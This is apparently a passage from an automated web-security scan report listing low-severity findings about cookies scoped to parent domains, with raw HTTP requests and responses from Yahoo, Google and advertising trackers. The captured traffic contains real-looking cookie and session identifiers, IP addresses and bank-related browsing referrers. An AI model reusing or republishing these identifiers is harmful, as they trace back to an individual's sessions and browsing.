Set-Cookie: answers=lnNtoV.J6A05H.TGewyRWub06PFmg.8lobmORupvn6CkoiDzOlmF4ZCYHq53uj7SPRS3PSGPDEvU_qNBXNlZb0.PRA8hV0DBSNm.7JpT9JobS843EZCaVwZgoQzl7PIfU_KIn2imxG0oJUUJzwzRE8HQU7KDfi5OO99qNOjQlOneWp8ieXG_yXvvUwnt5PdPItrUbpJ4.wiS8Nekw706wGoUdv2dvG9XRC77kwK939YrQwzJLRvWKbRFyABMUGpBras5kjJtlM9cI7jefA4tLGXxJh_rKm8Hmf4MvAd4oJTLs7KPSs8emMcAhuQg2cZZ.GR88RHIDVsbWxCQ4jcmuBSjN8GUCxPjoGNC4km.shCRuvtKX_1KJDEwy.JyNkBuELE51V7q0obDAPMQxO5HnHu6Ix8yGOopJMmS_QlV7vXCP04fijuYMrck1axEgwguUa6zSlJm.vl4CAVkbyPa6rzwe43pmrBJSnZaYpSAxmVej3hUEJWDX8B6pUMYRms7gu_UdBQ4Mzrc411EMSlAejUdfyQHHEAJxFh_GDmqLqV6I572R.xt8Fe.WStK1A9ERU83X17RFeSyMA.T8S7X5OUX42nXFONwPPTWzagOMVKcArc4ODuAkHNUd5JDBf_KiJdqth.8ndJCJ1Nh2YQ-; expires=Thu, 03-May-2012 13:14:25 GMT; path=/; domain=.answers.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 79733

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-us" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...

15.11. http://answers.yahoo.com/question/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /question/index

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /question/index HTTP/1.1
Host: answers.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:14:23 GMT
Set-Cookie: B=8i001rh6rvvtf&b=3&s=qp; expires=Tue, 03-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Status: 404 Not Found
Imagetoolbar:
Set-Cookie: answers=MmD4EaSX6A0kmA76gW8c7h3Hi.9jI4cnSXqZz5gFTu0CNQbcLf_aPusEdOiVpQsztBEQGHjrKI4F5Ll4WUrkhPTjKQAVcPGHnlEyZb1gyapSA3QSsaF2DvZgDesI5gyb_U4BraGydvrs3782csAPzxzCLudhFqk1hcw2.zvzuV8Tgy6EAesWIlc9R18TcvuTPLgMSc_GvH9SKG3Mnksbtui.YosZOKVQ3eN81d23SPXuJ5wV1tFt_GbMNFJWgWmXqQy9SSEBgCsVptWGJ1RT6UeEIEk5_DLnSeMkzfpNQ5_.P0hvvX24WR_e3hen1eNVDR4g9uU2sWEO.bJdZYhObARQzppkU7iijImyhHeD2NSrhjaPUNEHcG.Nk72Q.hVCJ3E9FHn4GL0Mr3ifz4tIAD3NB7zQgQ_ff3VpiuoWJfENCk.9AVX0UOFjiR.D9QSrfP0Ap6vYJvKMmMpW_6TcXIS4cbqTTCODs2wT3D0U5uUpnIdXBFgWPi8-; expires=Thu, 03-May-2012 13:14:23 GMT; path=/; domain=.answers.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 31139

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-us" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...

15.12. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1092513615&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fgroup.barclays.com%252FWhat-we-do%252FSponsorship%252FCommunity-sponsorship%26jsref%3Dhttp%253A%252F%252Fgroup.barclays.com%252FHome%26rnd%3D1304436107086&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fgroup.barclays.com%2FWhat-we-do%2FSponsorship%2FCommunity-sponsorship&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fgroup.barclays.com%2FWhat-we-do%2FSponsorship%2FCommunity-sponsorship&jsref=http%3A%2F%2Fgroup.barclays.com%2FHome&rnd=1304436107086
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 03 May 2011 10:21:49 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Thu, 02-May-2013 10:21:49 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


15.13. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dc048d9159e4ae3&curl=http%3a%2f%2fwww.set.or.th%2fen%2fregulations%2fcg%2froles_p1.html HTTP/1.1
Host: cspix.media6degrees.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
Cookie: clid=2lkaebs01171xcfgwn0ixqhg0000000138010i01401; ipinfo=2lkaebs0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; vstcnt=417s010r014smk6127p1002

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=012020a1lkaebsxzt1c35j; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 13:58:23 GMT; Path=/
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lkaebs01171xcfgwn0ixqhg0c35j0023f010j01501; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 13:58:23 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4010znmlkmhhb000000013f01; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 13:58:23 GMT; Path=/
Set-Cookie: sglst=20a0sabflkmhhb000000013f010j015018nelkmhhb000000013f010j01501647lkmhhb000000013f010j01501ag3lkmhhb000000013f010j015019rylkmhhb000000013f010j01501dg4lkmhhb000000013f010j01501bnzlkmhhb000000013f010j015010tilkmhhb000000013f010j01501cgzlkmhhb000000013f010j01501a6rlkmhhb000000013f010j01501; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 13:58:23 GMT; Path=/
Set-Cookie: vstcnt=417s010r024smk6127p10024nnav118e1022; Domain=media6degrees.com; Expires=Sun, 30-Oct-2011 13:58:23 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030881291/?label=h2HNCM_rmQIQi4DI6wM&guid=ON&script=0
Content-Length: 0
Date: Tue, 03 May 2011 13:58:23 GMT


15.14. http://dis.us.criteo.com/dis/dis.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.us.criteo.com
Path:   /dis/dis.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dis/dis.aspx?p1=v%3D2%26wi%3D7710772%26pt1%3D2%26i%3D298028&t1=sendEvent&p=1668&c=2&cb=35973562138 HTTP/1.1
Host: dis.us.criteo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Date: Tue, 03 May 2011 13:33:22 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: uid=fd340c48-97d9-49e6-b9cc-cc11447dc047; domain=.criteo.com; expires=Tue, 03-May-2016 13:33:23 GMT; path=/
Set-Cookie: udc=*1PvotshjACjE74y20GwJvMA%3d%3d; domain=.criteo.com; expires=Thu, 03-Nov-2011 14:33:23 GMT; path=/
Set-Cookie: udi=*1TyLg%2bj8kO0nl1twETGzjjw%3d%3d; domain=.criteo.com; expires=Wed, 04-May-2011 13:33:23 GMT; path=/
Set-Cookie: uic=*1UcqyCJ5ErLKWGtByvFQO3g%3d%3d; domain=.criteo.com; expires=Thu, 03-Nov-2011 14:33:23 GMT; path=/
Set-Cookie: evt=*1qpkjuDrZFBe7djnQgTUIuQ%3d%3d; domain=.criteo.com; expires=Thu, 03-Nov-2011 14:33:23 GMT; path=/
Content-Length: 9

<HTML/>

15.15. http://ds.addthis.com/red/psi/sites/www.set.or.th/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.set.or.th/p.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /red/psi/sites/www.set.or.th/p.json?callback=_ate.ad.hpr&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.set.or.th%2Fen%2Fregulations%2Fcg%2Froles_p1.html&ref=http%3A%2F%2Fwww.set.or.th%2Fen%2Findex.html&zu5tb1 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
Cookie: uid=4dc048d9159e4ae3; uit=1; psc=4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 432
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 03 May 2011 13:58:05 GMT; Path=/
Set-Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; Domain=.addthis.com; Expires=Mon, 01 Aug 2011 13:58:05 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 02 Jun 2011 13:58:05 GMT; Path=/
Set-Cookie: di=%7B%7D..1304431085.1FE|1304431085.1OD|1304431085.60; Domain=.addthis.com; Expires=Thu, 02-May-2013 02:39:07 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 03 May 2011 13:58:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:58:05 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degree
...[SNIP]...

15.16. http://edge.aperture.displaymarketplace.com/displayscript.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /displayscript.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 HTTP/1.1
Host: edge.aperture.displaymarketplace.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Server: D2C.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/javascript; charset=utf-8
Content-Length: 14891
Expires: Tue, 03 May 2011 13:32:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:32:56 GMT
Connection: close
Set-Cookie: mpackc=v1^1016|1234|2175; domain=displaymarketplace.com; expires=Fri, 03-May-2013 13:32:52 GMT; path=/

if (liveCon_ClientID === undefined)// && datran_ClientID === undefined)
{
   var liveCon_ClientID = 4157529279552;
}

//-----------------Helper Methods----------------------

function liveCon_Get
...[SNIP]...

15.17. http://get.adobe.com/flashplayer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://get.adobe.com
Path:   /flashplayer/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flashplayer/ HTTP/1.1
Host: get.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:22:31 GMT
Server: JRun Web Server
Content-Type: text/html; charset=UTF-8
Cache-Control: private, no-store, no-cache
Content-Language: en-US
Content-Language: en-US
Set-Cookie: SETTINGS.LOCALE=en%5Fus;domain=.adobe.com;expires=Thu, 25-Apr-2041 13:22:32 GMT;path=/cfusion/
Connection: close
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="EN_US">
<he
...[SNIP]...

15.18. http://html.aggregateknowledge.com/iframe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://html.aggregateknowledge.com
Path:   /iframe

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe?pid=32&itemid=298028&senduuid=0&che=1304429183 HTTP/1.1
Host: html.aggregateknowledge.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=675403482179266479; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Sun, 01-May-2016 13:33:19 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0AARa%2Bq0AAAAAAAEAEOFTAAAAIAAA; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Thu, 02-May-2013 13:33:19 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 301
Date: Tue, 03 May 2011 13:33:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<meta http-equiv="pragma" content="no-cache">
</head>

<body style="border: 0; margin: 0
...[SNIP]...

15.19. http://id.google.com/verify/EAAAACvp35bQYF1JBTLact6hVgw.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAACvp35bQYF1JBTLact6hVgw.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAACvp35bQYF1JBTLact6hVgw.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=barkley+bank
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=cG7_kP4csrCRnt6FyiHVgazMjWaa5f_ixkgIIJmF-w=TZ0Gm_6hBb_3fQQN; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=HfFdn9n5LQSBV_6qMo8w5eh1JPxJ22N4d7ME-n4CpoG0Pt1fAvuZFMASF-UtF6oB21IuFyfkLpYaH0m_T3hMrA31Aueqwtif5xnsXw2EUw1C8kNgsQLLVpzPIAlyXsyf

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=46=A_UeGTL6ByxPlXmh-Z8hIywvvdx8GHYIZkRlwrI6qg=VVMyJ5CRvnNhklAW; expires=Wed, 02-Nov-2011 10:20:31 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 03 May 2011 10:20:31 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

15.20. http://id.google.com/verify/EAAAAGtz_EH3k7Yc1hyVHgvxIEg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAGtz_EH3k7Yc1hyVHgvxIEg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAGtz_EH3k7Yc1hyVHgvxIEg.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Kasikorn+Bank
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=46=A_UeGTL6ByxPlXmh-Z8hIywvvdx8GHYIZkRlwrI6qg=VVMyJ5CRvnNhklAW; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=HfFdn9n5LQSBV_6qMo8w5eh1JPxJ22N4d7ME-n4CpoG0Pt1fAvuZFMASF-UtF6oB21IuFyfkLpYaH0m_T3hMrA31Aueqwtif5xnsXw2EUw1C8kNgsQLLVpzPIAlyXsyf

Response

HTTP/1.1 200 OK
Set-Cookie: NID=46=acSPd8Kefo7UVfp2rrsX7MvMbbFbC_p0DFBwNMSS9hIpvqoBS7sbRUdsd-3AK6Z1qzfNC-3jjdoFTI8QMr8hgigvHeieDToRNhf6IyV8kWDDFmb39r-VWGRaILAhefvc; expires=Wed, 02-Nov-2011 12:24:43 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 03 May 2011 12:24:43 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

15.21. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=703223&srvc=17&betr=A4308=LP&betq=8131=400416 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/Loans/P1242557963420
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=Bgo++2kAAAAAZm1CAEAAYCABAAAABAAAAwAAYCA; BASE=Rgwq2yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700L!; ROLL=boAns2y+ORAgE35hcNnzzw4yJN5Vmd+Ul5QpwcLSPtbwfqO!; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; C2=IR1vN5pqFIxFGFiovUg3sYkxSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCA9qBwhw2kXAcIY4dGAHCB9qBwhQTaaAcIcbmGAXtqWgGzakx1uaBhMrByHZAGAazFrhZmjohVG7IFwGlGKfj0jw+NXYXLirBFAbRjU2KoaQHw6pBvHphxUJ9GsuoGNykQZANZXYMs6uBBMnhxQrcGsNrGGTqHYwzeZYMgCmBvCix2Ob1HQiqGVwovfw10YUPRCMC7Gdxl4a+IQ4kGN1sQhwSkakXo6PCh6lhkB; GUID=MTMwNDM4NDU4NDsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:24:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=Zf9vN5pqFIxFGVgovUg3sYkqSKMCItdBUhQ3WXAVIoLOGQFCKGeBUhQ3gZAVIMa4FQFCEGeBUhAmoZAVIwtlGQFCA9qBUhw2kXAVIY4dGQFCB9qBUhQTaaAVIcbmGQVtqWgGzakq1uaBhMrBWHZAFAazF7vZmjoh5F7IFwGlGadj0jw+NXYQLirBFAbRHU2KoaQAw6pBvHphVUJ9GsuoGdwkQZANZXYFs6uBBMnhVQrcGsNrGWRqHYwzeZYFgCmBvCixaOb1GQiqGl+ovfw10YUIRCMC7GdxJ4a+IQ4kGdzsQhwSkakQo6PCh6lhI95wIACHGAH; domain=advertising.com; expires=Thu, 02-May-2013 10:24:25 GMT; path=/
Set-Cookie: GUID=MTMwNDQxODI2NTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Thu, 02-May-2013 10:24:25 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Tue, 03 May 2011 11:24:25 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

15.22. http://m1645.ic-live.com/515/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m1645.ic-live.com
Path:   /515/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /515/?120309983&OVMTC=Broad&site=&creative=13009393759&OVKEY=internet%20banks&url_id=120309983/x22 HTTP/1.1
Host: m1645.ic-live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A90CA7BE414083D63F763116609BD757.mch2-rdr-1; Path=/
Set-Cookie: ngx_userid=173.193.214.243:1304429032578; Domain=.ic-live.com; Expires=Thu, 02-May-2013 13:23:52 GMT; Path=/
Set-Cookie: pid2=130442903345Pdn0xP+YDR99; Domain=.ic-live.com; Expires=Wed, 02-May-2012 13:23:52 GMT; Path=/
Set-Cookie: sid1645=130442903345Pdn0xP+YDR99; Domain=.ic-live.com; Path=/
Set-Cookie: cvt515=120309983; Domain=.ic-live.com; Expires=Thu, 02-Jun-2011 13:23:52 GMT; Path=/
Set-Cookie: ngx_120309983=2011-05-03:06:23:52; Domain=.ic-live.com; Expires=Wed, 04-May-2011 13:23:52 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT"
Location: http://www.pncsites.com/LP/Checking/VWPerformance/default.html?WT.mc_id=11SRCH_Search_0148&WT.srch=1
Date: Tue, 03 May 2011 13:23:51 GMT
Connection: close


15.23. http://metrics.seenon.com/b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.seenon.com
Path:   /b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

